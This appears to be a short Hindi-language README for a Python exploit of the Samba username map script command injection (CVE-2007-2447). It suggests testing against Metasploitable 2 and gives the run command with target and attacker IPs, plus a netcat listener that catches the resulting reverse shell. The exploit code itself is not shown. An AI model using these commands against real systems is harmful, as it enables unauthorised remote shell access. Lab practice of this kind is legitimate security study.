
CVE-2007-2447 के लिए Python एक्सप्लॉइट जो कमजोर लक्ष्यों पर रिवर्स शेल खोलने के लिए Samba उपयोगकर्ता नाम मैप स्क्रिप्ट कमांड इंजेक्शन ट्रिगर करता है।
स्क्रिप्ट का परीक्षण करने के लिए मैं आपको वर्चुअल मशीन "metasploitable 2" की सिफारिश करता हूँ जो यहाँ उपलब्ध है। यदि एक्सप्लॉइट काम करता है तो स्क्रिप्ट एक रिवर्स शेल प्रदर्शित करेगी। कनेक्शन प्राप्त करने के लिए, बस netcat सत्र इस प्रकार खोलें :
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
और मेरे netcat पर :
netcat -lnvp 1337
परिणाम :
netcat :
alt text
और स्क्रिप्ट पर:
alt text
मैंने एक चीट-शीट का पेलोड उपयोग किया। लिंक यहाँ उपलब्ध है। आप इसे अन्य पेलोड से बदल सकते हैं।